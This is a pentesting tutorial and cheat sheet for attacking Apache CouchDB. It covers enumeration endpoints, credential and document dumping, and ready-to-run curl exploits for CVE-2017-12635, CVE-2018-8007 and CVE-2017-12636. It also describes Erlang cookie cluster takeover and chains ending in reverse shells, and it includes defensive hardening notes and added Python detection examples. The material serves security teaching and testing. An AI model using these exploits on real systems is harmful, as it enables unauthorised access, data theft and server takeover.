# CouchDB - Port 5984,6984

{% tabs %}
{% tab title="Support VeryLazyTech 🎉" %}

* Become VeryLazyTech [**member**](https://whop.com/verylazytech/)**! 🎁**
* **Follow** us on:
  * **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.**
  * **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.**
  * **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
  * **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.**
  * **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.**
  * **🕵️‍♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.**
* Visit our [**shop**](https://whop.com/verylazytech/) for e-books and courses. 📚
{% endtab %}
{% endtabs %}

### Basic info

CouchDB is **a document-oriented, schema-less NoSQL database where every "document" is just JSON.**

Internally, CouchDB stores:

| Field  | Meaning                          |
| ------ | -------------------------------- |
| `_id`  | The document’s unique identifier |
| `_rev` | Revision number (tracks changes) |

Documents can contain key-value mappings, nested maps, or lists.\
Everything is accessed through **HTTP REST APIs** — not drivers.

#### Default Ports

| Port     | Protocol | Purpose                                                        |
| -------- | -------- | -------------------------------------------------------------- |
| **5984** | HTTP     | Public API                                                     |
| **6984** | HTTPS    | Public API                                                     |
| **5986** | Internal | Node-local API                                                 |
| **4369** | TCP      | Erlang Port Mapper Daemon (EPMD) — extremely important for RCE |

And if you see **port 4369 (EPMD)** → your hacker senses should start tingling. (More on that later.)

***

## **Automatic Enumeration**

#### Nmap

```bash
nmap -sV --script couchdb-databases,couchdb-stats -p 5984 <IP>
```

#### Metasploit

```bash
msf> use auxiliary/scanner/couchdb/couchdb_enum
```

***

## **Manual Enumeration (Must-Know for Real Pentesters)**

#### Check if CouchDB is reachable

```bash
curl http://<IP>:5984/
```

Possible outputs:

**Unauthenticated access allowed:**

```json
{"couchdb":"Welcome","version":"2.0.0","vendor":{"name":"The Apache Software Foundation"}}
```

**Authentication required:**

```json
{"error":"unauthorized","reason":"Authentication required."}
```

If you see **401**, you’ll need creds or an exploit.
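As an added example (not code from the original page), a small Python helper that classifies the root-endpoint response exactly as described above and applies the version rule of thumb from the defence section (1.x and 2.x before 2.2 need upgrading). The two sample bodies are the responses quoted above; `fetch_root` and `assess_root_response` are assumed helper names.

```python
import json
import re
import urllib.error
import urllib.request

# Page rule of thumb: 1.x and 2.x before 2.2 are treated as needing an upgrade.
def needs_upgrade(version: str) -> bool:
    m = re.match(r"(\d+)\.(\d+)", version)
    if not m:
        return False                      # unknown format: cannot judge
    major, minor = int(m.group(1)), int(m.group(2))
    return major == 1 or (major == 2 and minor < 2)

def assess_root_response(status: int, body: str) -> dict:
    """Classify GET / on port 5984: open, auth-required, or not CouchDB at all."""
    try:
        data = json.loads(body)
    except ValueError:                    # HTML or garbage: not the CouchDB API
        return {"couchdb": False, "auth_required": False, "version": None, "needs_upgrade": False}
    if status == 401 or data.get("error") == "unauthorized":
        return {"couchdb": True, "auth_required": True, "version": None, "needs_upgrade": False}
    version = data.get("version")
    return {
        "couchdb": data.get("couchdb") == "Welcome",
        "auth_required": False,
        "version": version,
        "needs_upgrade": needs_upgrade(version or ""),
    }

def fetch_root(base_url: str, timeout: float = 5.0) -> dict:
    """Assumed helper: GET <base_url>/ and classify the answer (401 still carries JSON)."""
    req = urllib.request.Request(base_url.rstrip("/") + "/", headers={"Accept": "application/json"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return assess_root_response(resp.status, resp.read().decode())
    except urllib.error.HTTPError as err:
        return assess_root_response(err.code, err.read().decode())

# Constructed inputs: the two response bodies quoted above.
OPEN_BODY = '{"couchdb":"Welcome","version":"2.0.0","vendor":{"name":"The Apache Software Foundation"}}'
AUTH_BODY = '{"error":"unauthorized","reason":"Authentication required."}'

if __name__ == "__main__":
    print(assess_root_response(200, OPEN_BODY))
    print(assess_root_response(401, AUTH_BODY))
```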

***

## **High-Value Endpoints Hackers Should Always Check**

These endpoints typically reveal **database names**, **cluster metadata**, and **replication details** — sometimes containing **API keys**, **JWT secrets**, **production credentials**, or **remote cluster URLs**.

| Endpoint               | What It Reveals                              |
| ---------------------- | -------------------------------------------- |
| `/_active_tasks`       | Replication, indexing jobs, DB names         |
| `/_all_dbs`            | **All database names** (usually the jackpot) |
| `/_cluster_setup`      | Cluster configuration                        |
| `/_db_updates`         | Real-time database creation events           |
| `/_membership`         | Cluster nodes                                |
| `/_scheduler/jobs`     | Replication job data (can include credentials) |
| `/_node/_local/_stats` | System info                                  |
| `/_up`                 | Basic health check                           |
| `/_uuids`              | UUID generation                              |
| `/_reshard`            | Shard operations                             |

Use:

```bash
curl http://<IP>:5984/_all_dbs
```

If 401:

```bash
curl http://user:pass@<IP>:5984/_all_dbs
```

***

## **Extracting Databases, Documents & Credentials**

#### List databases

```bash
curl http://<IP>:5984/_all_dbs
```

Example:

```json
["_global_changes","_metadata","_replicator","_users","passwords","simpsons"]
```

#### Show DB metadata

```bash
curl http://<IP>:5984/<dbname>
```

#### List documents

```bash
curl http://<IP>:5984/<dbname>/_all_docs
```

#### Read a document

```bash
curl http://<IP>:5984/<dbname>/<doc_id>
```

At this point, in real pentests, you often find:

✔ API keys\
✔ Auth tokens\
✔ Password databases\
✔ Backups\
✔ Internal cluster secrets\
✔ User PII

***

## **Exploitation Techniques**

CouchDB has had **multiple high-impact CVEs**, many still found in the wild.

#### **CVE-2017-12635 — Create an Admin User Without Authentication**

This is the **most famous and most dangerous CouchDB vulnerability ever discovered**.

#### 🧠 Why it works

CouchDB parses JSON twice — once in **Erlang**, once in **JavaScript**.

If you send **two fields with the same key**, the Erlang parser keeps both (and its lookup returns the first), but the JS parser keeps only the last.

Meaning this payload:

```json
{
  "type":"user",
  "name":"hacktricks",
  "roles":["_admin"],
  "roles":[],
  "password":"hacktricks"
}
```

→ **Erlang sees roles=\["\_admin"]**\
→ **JS sees roles=\[]**

CouchDB incorrectly grants admin privileges.
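The parser mismatch above, modelled in Python as an added example (not code from the page or from CouchDB): one hook reproduces first-value-wins lookup on the Erlang side, plain `json.loads` reproduces last-value-wins like `JSON.parse`, and a strict hook shows the defensive fix of rejecting duplicate keys outright. `validate_user_doc` is a simplified, assumed stand-in for the `_users` validation rule.

```python
import json
# The payload quoted above: the "roles" key appears twice in one object.
PAYLOAD = ('{"type":"user","name":"hacktricks","roles":["_admin"],'
           '"roles":[],"password":"hacktricks"}')

def _first_wins(pairs):
    """Models the Erlang side (a jiffy proplist): lookup returns the first match."""
    doc = {}
    for key, value in pairs:
        doc.setdefault(key, value)   # later duplicates never override
    return doc

def _reject_duplicates(pairs):
    """Hardened parser hook: refuse any object that repeats a key."""
    seen = set()
    for key, _ in pairs:
        if key in seen:
            raise ValueError(f"duplicate key {key!r} in JSON object")
        seen.add(key)
    return dict(pairs)

def parse_erlang_side(text: str) -> dict:
    return json.loads(text, object_pairs_hook=_first_wins)

def parse_js_side(text: str) -> dict:
    return json.loads(text)          # like JSON.parse: the last duplicate wins

def parse_strict(text: str) -> dict:
    return json.loads(text, object_pairs_hook=_reject_duplicates)

def strict_parse_rejects(text: str) -> bool:
    try:
        parse_strict(text)
        return False
    except ValueError:
        return True

def validate_user_doc(doc: dict, requester_is_admin: bool) -> bool:
    """Simplified _users validate_doc_update rule (assumed): a non-admin requester
    may not assign roles that start with an underscore, such as _admin."""
    if requester_is_admin:
        return True
    return not any(role.startswith("_") for role in doc.get("roles", []))

def simulate_user_creation(text: str, requester_is_admin: bool = False):
    """(validation_passed, roles_actually_stored) for an unauthenticated PUT."""
    passed = validate_user_doc(parse_js_side(text), requester_is_admin)
    stored = parse_erlang_side(text)["roles"] if passed else None
    return passed, stored
```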

#### Exploit:

```bash
curl -X PUT -d '{"type":"user","name":"hacktricks","roles":["_admin"],"roles":[],"password":"hacktricks"}' \
     http://<IP>:5984/_users/org.couchdb.user:hacktricks \
     -H "Content-Type:application/json"
```

You now have **admin control of the entire server**.

***

#### **CVE-2018-8007 — RCE via local.ini write injection (OS Daemons)**

If an attacker can write to `local.ini` (misconfigured perms), they can register system daemons to be executed by CouchDB.

Injection example:

```bash
curl -X PUT 'http://admin:admin@localhost:5984/_node/couchdb@localhost/_config/cors/origins' \
     -d "evil\n\n[os_daemons]\npwn=/usr/bin/touch /tmp/pwned"
```

Then:

```
kill couchdb PID
```

CouchDB restarts → executes `/usr/bin/touch /tmp/pwned`.

This is **full OS command execution**.
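The request above works because a single config value carrying line breaks is pasted into `local.ini` verbatim. As an added Python example (not code from the page or from CouchDB), a constructed naive writer reproduces that result, `is_safe_config_value` is the write-time check that refuses such values, and `os_daemons_in` is a `configparser`-based detector for `[os_daemons]` entries that should not be in a reviewed `local.ini`.

```python
import configparser

# The value from the injection request above (constructed copy; \n are real newlines here).
INJECTED_VALUE = "evil\n\n[os_daemons]\npwn=/usr/bin/touch /tmp/pwned"

def is_safe_config_value(value: str) -> bool:
    """A config value must stay on one ini line: reject CR, LF and NUL."""
    return not any(ch in value for ch in "\r\n\0")

def naive_write(section: str, key: str, value: str) -> str:
    """Constructed model of a writer that pastes the value into the ini verbatim."""
    return f"[{section}]\n{key} = {value}\n"

def safe_write(section: str, key: str, value: str):
    """Hardened writer: returns the ini text, or None if the value is refused."""
    if not is_safe_config_value(value):
        return None
    return naive_write(section, key, value)

def os_daemons_in(ini_text: str) -> dict:
    """Detection: return every [os_daemons] entry found in a local.ini text."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(ini_text)
    if not cp.has_section("os_daemons"):
        return {}
    return dict(cp["os_daemons"])

if __name__ == "__main__":
    print(naive_write("cors", "origins", INJECTED_VALUE))      # shows the injected section
    print(os_daemons_in(naive_write("cors", "origins", INJECTED_VALUE)))
    print(safe_write("cors", "origins", INJECTED_VALUE))       # None: refused
```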

#### **CVE-2017-12636 — RCE via malicious query server definitions**

CouchDB allows admins to define query servers, e.g.:

```ini
[query_servers]
python=/usr/bin/python3
```

But if you can write:

```ini
cmd=/bin/sh
```

You can trigger it by creating a view that calls the query server.

Example exploitation flow:

```bash
curl -X PUT http://admin:pass@host:5984/evil
curl -X PUT http://admin:pass@host:5984/evil/payload -d '{"_id":"x"}'
curl -X PUT http://admin:pass@host:5984/evil/_design/pwn \
     -d '{"views":{"x":{"map":""}},"language":"cmd"}'
```

Boom → command execution.

#### **Erlang Cookie RCE (Not a CVE — but extremely real)**

If port **4369 (EPMD)** is open AND you can read the Erlang cookie file (usually `.erlang.cookie`), you can:

✔ Join the CouchDB cluster\
✔ Execute arbitrary Erlang code\
✔ Spawn remote shells\
✔ Dump secrets\
✔ Control the entire node

This is a **full cluster compromise**.

Erlang cookies are commonly found in:

```
/home/couchdb/.erlang.cookie
/home/<user>/.erlang.cookie
```

If readable → game over.

***

## **Practical Real-World Attack Chains**

### Attack Chain 1:

#### **Unauthenticated CouchDB + Exposed \_all\_dbs → Secrets → Lateral Movement**

1. Access `/_all_dbs`
2. Dump `_replicator` DB
3. Replication tasks often include remote credentials
4. Use creds to pivot into AWS, GitLab, MongoDB, etc.

***

### Attack Chain 2:

#### **CVE-2017-12635 Admin Creation → Query Server RCE → Reverse Shell**

1. Create admin user (CVE-2017-12635)
2. Add malicious query server
3. Trigger RCE via design document
4. Send reverse shell payload
5. Full system compromise

***

### Attack Chain 3:

#### **Misconfigured local.ini → CouchDB Daemon Injection (CVE-2018-8007) → Privilege escalation**

1. Write to `/home/*/etc/local.ini`
2. Inject `[os_daemons]`
3. Restart CouchDB → execute payload
4. Gain local user’s privileges
5. Escalate via sudo misconfig or cron jobs

***

### Attack Chain 4:

#### **Erlang Cookie Leakage → Cluster Takeover**

1. Access `.erlang.cookie` (world-readable)
2. Connect to EPMD node
3. Execute arbitrary Erlang commands
4. RCE without touching CouchDB API
5. Persist via erlang shell

This is extremely powerful and still commonly found.

***

## **Defending CouchDB (What Blue Teams Must Fix)**

✔ Disable remote access to 5984 unless behind firewall\
✔ Block port 4369 (EPMD) externally\
✔ Do NOT allow world-writable `local.ini`\
✔ Upgrade from vulnerable versions:

* 1.x
* 2.x pre-2.2

✔ Enforce authentication (`require_valid_user = true`)\
✔ Disable `_session` cookie if not needed\
✔ Disable CORS unless required\
✔ Rotate Erlang cookie after compromise\
✔ Disable default admin/admin accounts
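An added blue-team audit in Python (not code from the page or from CouchDB) that checks a `local.ini` for the settings in the list above (`require_valid_user`, CORS, a default `admin`/`admin` account) and checks the `.erlang.cookie` file mode. The ini fragments are constructed; `require_valid_user` is read from `[chttpd]` (2.x) with `[couch_httpd_auth]` (1.x) as fallback, and `check_cookie_mode` expects the `st_mode` from `os.stat`.

```python
import configparser
import stat

# Constructed local.ini fragments: one with the weak settings the checklist warns about, one hardened.
WEAK_INI = """\
[chttpd]
require_valid_user = false

[httpd]
enable_cors = true

[admins]
admin = admin
"""

HARDENED_INI = """\
[chttpd]
require_valid_user = true

[admins]
ops = -pbkdf2-<hash placeholder>
"""

def check_cookie_mode(mode: int) -> list:
    """Finding if ~/.erlang.cookie is accessible to group/others; pass os.stat(path).st_mode."""
    if mode & (stat.S_IRWXG | stat.S_IRWXO):
        return ["erlang cookie readable or writable by group/others (expected mode 0400)"]
    return []

def audit_local_ini(ini_text: str) -> list:
    """Return a list of findings for the settings named in the checklist."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(ini_text)
    findings = []
    rvu = cp.get("chttpd", "require_valid_user",
                 fallback=cp.get("couch_httpd_auth", "require_valid_user", fallback="false"))
    if rvu.strip().lower() != "true":
        findings.append("require_valid_user is not true: unauthenticated API access allowed")
    if cp.get("httpd", "enable_cors", fallback="false").strip().lower() == "true":
        findings.append("CORS is enabled; disable it unless required")
    admins = dict(cp["admins"]) if cp.has_section("admins") else {}
    for user, secret in admins.items():
        if user == "admin" and secret == "admin":
            findings.append("default admin/admin account present")
        elif not secret.startswith("-"):   # CouchDB rewrites plaintext entries to -pbkdf2- hashes on restart
            findings.append(f"admin {user!r} password still stored in plaintext")
    return findings
```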

***

## **Cheat Sheet Summary for Pentesters**

#### Enumeration

```
curl http://host:5984/
curl http://host:5984/_all_dbs
curl http://host:5984/<db>/_all_docs
curl http://host:5984/<db>/<id>
```

#### CVE-2017-12635 Admin Creation

```
curl -X PUT -d '{"type":"user","name":"pwn","roles":["_admin"],"roles":[],"password":"pwn"}'
```

#### CVE-2017-12636 / Query Server RCE

```
curl -X PUT /_config/query_servers/cmd -d '"/bin/sh"'
```

#### CVE-2018-8007 OS Daemon Injection

```
[os_daemons]
evil=/bin/sh /tmp/malicious.sh
```

#### Erlang Cookie RCE

Look for `.erlang.cookie` + port 4369 open.

***

{% hint style="success" %}
Learn & practice [**For the Bug Bounty**](https://whop.com/verylazytech/)

{% endhint %}

